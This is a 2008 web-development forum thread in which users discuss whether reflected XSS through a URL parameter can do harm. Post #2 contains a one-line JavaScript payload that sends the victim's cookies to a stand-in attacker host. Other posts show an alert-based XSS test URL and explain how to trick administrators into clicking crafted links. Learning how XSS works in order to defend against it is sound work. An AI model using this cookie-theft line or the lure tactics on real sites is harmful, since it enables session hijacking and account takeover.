SitePoint Sponsor

User Tag List

Results 1 to 10 of 10

Thread: XSS Attacks

  1. #1
    SitePoint Zealot
    Join Date
    Mar 2008
    Posts
    151
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    XSS Attacks

    Am i right in thinking that xss attacks can only do harm if the script is inserted into the webpage as apposed to just url exploit...

    e.g. a url xss hole like this is pretty pointless

    http://www.somesite.com/page.php?number=<script>alert('xss');</script>

    Even if it does display 'xss', is there much a hacker can do with this type of exploit?

    I know that if the code was inserted into a database then xss attacks can be used to hijack your session etc... but can much be done if the script it just ran in the browser?

  2. #2
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hacker can steal cookies.

    location.href = "http://www.hackersite.com/sniffer.php?cookies=" + escape(document.cookie);

  3. #3
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It is also is cookie linked with IP and do not work from other host then it is possible to make some action.
    Like hit button in admin area of site or change some users password.

    Gmail was hacked with xss and some guy lost his domain.

  4. #4
    SitePoint Zealot
    Join Date
    Mar 2008
    Posts
    151
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yeah but surely a hacker can't steal someone else's cookie if the code isn't inserted into the actual webpage (database) if the code is just passed into the url and not inserted into the database then surely it's just in the browser that the code gets executed, if the page is refreshed then the code will disapear as it's not inserted anywhere

  5. #5
    SitePοint Troll disgracian's Avatar
    Join Date
    Aug 2006
    Location
    Samsara
    Posts
    451
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It can if the nasty person plants the URL somewhere that an unsuspecting victim is likely to click on. URLs with the promise of naked celebrities accomplish this quite well.

    Hacking requires just as much knowledge of the human condition as it does on the technical side.

    Cheers,
    D.

  6. #6
    SitePoint Zealot
    Join Date
    Jul 2008
    Location
    Norway
    Posts
    100
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I recommend you to download and test the free version of Web Security Scanner from Acunetix.
    Acunetix scans all web applications and server for XSS, SQL injections and much more!

    You can read more about the application at this site.

  7. #7
    SitePoint Wizard bronze trophy
    Join Date
    Jul 2008
    Posts
    5,757
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Keep in mind if they can make some javascript to execute, they can make any javascript execute. This means they can completely control/rewrite your entire html page, steal cookies, and make the user do things they don't want to. It can sure make your website look like your doing bad things, and it may make search engines prompt virus warnings in search results.

  8. #8
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Shark3y3s View Post
    Yeah but surely a hacker can't steal someone else's cookie if the code isn't inserted into the actual webpage (database) if the code is just passed into the url and not inserted into the database then surely it's just in the browser that the code gets executed, if the page is refreshed then the code will disapear as it's not inserted anywhere
    They do not have to save it in db. They have to make someone click the link.
    e.g. You can send PM message to forum administrator with link and ask it to click. You can complain on some thread and put link with XSS. administrator will click the link but link will make hits in administrators page. (change passwords or give someone admin rights.)
    Last edited by max7; Sep 24, 2008 at 02:36.

  9. #9
    SitePoint Enthusiast
    Join Date
    Jun 2006
    Posts
    70
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    sorry if I don't quite understand here, supposed I enter this url:

    Code:
    http://www.somesite.com/page.php?number=<script>alert('xss');</script>
    then my browser automatically changes it to:

    Code:
    http://www.somesite.com/page.php?number=&#37;3Cscript%3Ealert('xss');%3C/script%3E
    does it mean my script safe? even if I echo $_GET['number']?

  10. #10
    SitePoint Zealot
    Join Date
    Sep 2008
    Posts
    199
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    No.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •